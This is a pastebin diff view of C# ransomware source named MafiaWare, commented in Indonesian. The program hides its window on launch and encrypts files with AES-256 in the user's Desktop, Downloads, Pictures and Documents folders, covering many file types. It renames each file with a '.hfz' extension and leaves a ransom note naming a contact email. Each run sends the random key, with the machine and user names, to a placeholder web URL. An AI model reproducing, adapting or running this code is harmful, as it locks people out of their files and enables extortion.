SHOW:
|
|
- or go back to the newest paste.
| 1 | /* | |
| 2 | * | |
| 3 | - | * MAFIAWARE |
| 3 | + | * RANSOMWARE |
| 4 | * Algorithm from HT, with C Sources | |
| 5 | * Encrypt with AES256 | |
| 6 | - | * contact email : cyberking@indonesianbacktrack.or.id |
| 6 | + | |
| 7 | - | * Indonesian Backtrack Team ( http://indonesianbacktrack.or.id/forum ) |
| 7 | + | |
| 8 | ||
| 9 | using System; | |
| 10 | using System.Diagnostics; | |
| 11 | using System.Collections.Generic; | |
| 12 | using System.ComponentModel; | |
| 13 | using System.Data; | |
| 14 | using System.Drawing; | |
| 15 | using System.Linq; | |
| 16 | using System.Text; | |
| 17 | using System.Threading.Tasks; | |
| 18 | using System.Windows.Forms; | |
| 19 | using System.Security; | |
| 20 | using System.Security.Cryptography; | |
| 21 | using System.IO; | |
| 22 | using System.Net; | |
| 23 | using Microsoft.Win32; | |
| 24 | using System.Runtime.InteropServices; | |
| 25 | using System.Text.RegularExpressions; | |
| 26 | ||
| 27 | namespace mafiaware {
| |
| 28 | public partial class Form1 : Form {
| |
| 29 | //Web untuk Password Unlock nya | |
| 30 | string webPass = "https://yourweb.com/cyberking/w00t.php?g0ttrap="; | |
| 31 | string namaUser = Environment.UserName; | |
| 32 | string namaKompi = System.Environment.MachineName.ToString(); | |
| 33 | string dirUsr = "C:\\Users\\"; //folder User | |
| 34 | // bisa di coba ke folder system32 | |
| 35 | //string dirSystm = "C:\\Windows\\"; <-- folder Windows di targetkan ke system32 di ubah/tambah bagian fungsi ngencrypt nya | |
| 36 | ||
| 37 | public Form1() {
| |
| 38 | InitializeComponent(); | |
| 39 | } | |
| 40 | private void Form1_Load(object sender, EventArgs e) {
| |
| 41 | Opacity = 0; | |
| 42 | this.ShowInTaskbar = false; | |
| 43 | ngeEnrypt(); //mulai ngencrypt nya pas loading | |
| 44 | ngeEnrypt2(); | |
| 45 | ngeEnrypt3(); | |
| 46 | ngeEnrypt4(); | |
| 47 | } | |
| 48 | private void Form_Shown(object sender, EventArgs e) {
| |
| 49 | Visible = false; | |
| 50 | Opacity = 100; | |
| 51 | } | |
| 52 | ||
| 53 | //Algo encrypt AES256 | |
| 54 | public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) {
| |
| 55 | byte[] encryptedBytes = null; | |
| 56 | byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
| |
| 57 | using (MemoryStream ms = new MemoryStream()) {
| |
| 58 | using (RijndaelManaged AES = new RijndaelManaged()) {
| |
| 59 | AES.KeySize = 256; | |
| 60 | AES.BlockSize = 128; | |
| 61 | var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000); | |
| 62 | AES.Key = key.GetBytes(AES.KeySize / 8); | |
| 63 | AES.IV = key.GetBytes(AES.BlockSize / 8); | |
| 64 | AES.Mode = CipherMode.CBC; | |
| 65 | using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) {
| |
| 66 | cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length); | |
| 67 | cs.Close(); | |
| 68 | } | |
| 69 | encryptedBytes = ms.ToArray(); | |
| 70 | } | |
| 71 | } | |
| 72 | return encryptedBytes; | |
| 73 | } | |
| 74 | ||
| 75 | //buat randompass encrypt | |
| 76 | public string BuatPass(int length) {
| |
| 77 | const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/"; | |
| 78 | StringBuilder res = new StringBuilder(); | |
| 79 | Random rnd = new Random(); | |
| 80 | while (0 < length--){
| |
| 81 | res.Append(valid[rnd.Next(valid.Length)]); | |
| 82 | } | |
| 83 | return res.ToString(); | |
| 84 | } | |
| 85 | ||
| 86 | //ngirim pass hasil trap ke web | |
| 87 | public void ngirimPass(string password){
| |
| 88 | string g0ttrap = namaKompi + "-" + namaUser + " " + password; | |
| 89 | var fullUrl = webPass + g0ttrap; | |
| 90 | var conent = new System.Net.WebClient().DownloadString(fullUrl); | |
| 91 | } | |
| 92 | ||
| 93 | //ngencrypt file | |
| 94 | public void ngencryptFile(string file, string password) {
| |
| 95 | byte[] bytesToBeEncrypted = File.ReadAllBytes(file); | |
| 96 | byte[] passwordBytes = Encoding.UTF8.GetBytes(password); | |
| 97 | ||
| 98 | //ngehash pass dg sha256 | |
| 99 | passwordBytes = SHA256.Create().ComputeHash(passwordBytes); | |
| 100 | byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes); | |
| 101 | File.WriteAllBytes(file, bytesEncrypted); | |
| 102 | System.IO.File.Move(file, file+".hfz"); //ekstensi hasil ngencrypt | |
| 103 | } | |
| 104 | - | System.IO.File.Move(file, file+".Locked-Mafiaware"); //ekstensi hasil ngencrypt |
| 104 | + | |
| 105 | //ngencrypt folder | |
| 106 | public void ngencryptFolder(string location, string password) {
| |
| 107 | //ekstensi yang mau di encrypt | |
| 108 | var validExtensions = new[] {
| |
| 109 | ".txt", ".doc", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".zip", ".rar" | |
| 110 | }; | |
| 111 | ||
| 112 | string[] files = Directory.GetFiles(location); | |
| 113 | string[] childDirectories = Directory.GetDirectories(location); | |
| 114 | for (int i = 0; i < files.Length; i++){
| |
| 115 | string extension = Path.GetExtension(files[i]); | |
| 116 | if (validExtensions.Contains(extension)) | |
| 117 | {
| |
| 118 | ngencryptFile(files[i],password); | |
| 119 | } | |
| 120 | } | |
| 121 | for (int i = 0; i < childDirectories.Length; i++){
| |
| 122 | ngencryptFolder(childDirectories[i],password); | |
| 123 | } | |
| 124 | } | |
| 125 | public void ngeEnrypt() {
| |
| 126 | string password = BuatPass(15); | |
| 127 | string path = "\\Desktop"; | |
| 128 | string startPath = dirUsr + namaUser + path; | |
| 129 | ngirimPass(password); | |
| 130 | ngencryptFolder(startPath,password); | |
| 131 | pesanReadMe(); | |
| 132 | password = null; | |
| 133 | System.Windows.Forms.Application.Exit(); | |
| 134 | } | |
| 135 | public void ngeEnrypt2() {
| |
| 136 | string password = BuatPass(15); | |
| 137 | string path = "\\Downloads"; | |
| 138 | string startPath = dirUsr + namaUser + path; | |
| 139 | ngirimPass(password); | |
| 140 | ngencryptFolder(startPath,password); | |
| 141 | password = null; | |
| 142 | System.Windows.Forms.Application.Exit(); | |
| 143 | } | |
| 144 | public void ngeEnrypt3() {
| |
| 145 | string password = BuatPass(15); | |
| 146 | string path = "\\Pictures"; | |
| 147 | string startPath = dirUsr + namaUser + path; | |
| 148 | ngirimPass(password); | |
| 149 | ngencryptFolder(startPath,password); | |
| 150 | password = null; | |
| 151 | System.Windows.Forms.Application.Exit(); | |
| 152 | } | |
| 153 | ||
| 154 | //ngencrypt 4 bagian document, jika ada folder music / shortcut music, itu ga bakal kena, perbedaan auth | |
| 155 | public void ngeEnrypt4() {
| |
| 156 | - | //ngencrypt 4 bagian document, jika ada folder music / shortcut music, itu ga bakal kena, perbedaan auth :p akalin sendiri utk lebih jelas |
| 156 | + | |
| 157 | string path = "\\Documents"; | |
| 158 | string startPath = dirUsr + namaUser + path; | |
| 159 | ngirimPass(password); | |
| 160 | ngencryptFolder(startPath,password); | |
| 161 | password = null; | |
| 162 | System.Windows.Forms.Application.Exit(); | |
| 163 | } | |
| 164 | //Pesanini diletakkan di folder desktop ( bisa di ubah atau di tambah lokasi nya, edit di bagian fungsi ngencrypt ) | |
| 165 | public void pesanReadMe() {
| |
| 166 | string path = "\\Desktop\\READ_ME.txt"; | |
| 167 | string fullpath = dirUsr + namaUser + path; | |
| 168 | string[] lines = { "Cyberking was Encrypt your File with MafiaWare", "Email me and meet me", "my email cyberking@indonesianbacktrack.or.id" };
| |
| 169 | System.IO.File.WriteAllLines(fullpath, lines); | |
| 170 | } | |
| 171 | } | |
| 172 | } |
